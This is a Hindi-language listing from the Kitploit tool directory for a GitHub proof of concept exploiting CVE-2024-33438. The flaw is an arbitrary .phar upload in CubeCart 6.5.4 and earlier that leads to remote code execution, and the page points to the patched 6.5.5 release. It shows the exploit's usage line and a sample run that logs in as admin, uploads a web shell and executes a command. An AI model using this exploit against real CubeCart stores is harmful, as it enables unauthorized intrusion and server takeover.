Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 में एक मनमानी फ़ाइल अपलोड की कमज़ोरी है जो रिमोट कोड निष्पादन (RCE) का कारण बनती है। | Kitploit
उपकरण/GitHubGitHub/julio-cfa/cve-2024-33438
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 में एक मनमानी फ़ाइल अपलोड की कमज़ोरी है जो रिमोट कोड निष्पादन (RCE) का कारण बनती है।

रिपॉजिटरी देखें
3372 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मनमानी फ़ाइल अपलोड से RCE (CVE-2024-33438)

CubeCart <= 6.5.4 एक मनमानी फ़ाइल अपलोड समस्या के लिए संवेदनशील है जो रिमोट कोड निष्पादन (RCE) की ओर ले जाती है। यह कमजोरी एप्लिकेशन के फ़ाइल प्रबंधक और इसके फ़िल्टर को प्रभावित करती है, जिससे हमलावर दुर्भावनापूर्ण कोड वाली .phar फ़ाइलें अपलोड कर सकते हैं। CubeCart को 6.5.5 में अपडेट किया जाना चाहिए क्योंकि इसमें इस कमजोरी को ठीक करने के लिए एक सुरक्षा पैच लागू किया गया है।

अधिक विवरण के लिए, कृपया संदर्भों में CubeCart की आधिकारिक घोषणा देखें।

शोषण

एक स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) बनाया गया है, लेकिन इस कमजोरी का फ़ाइल प्रबंधक के माध्यम से एक दुर्भावनापूर्ण .phar फ़ाइल अपलोड करके मैन्युअल रूप से भी शोषण किया जा सकता है।

यह PoC का उपयोग है:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

इसे चलाने के बाद, सफल शोषण के लिए अपेक्षित आउटपुट यह है:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

संदर्भ

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
टूल डाउनलोड करें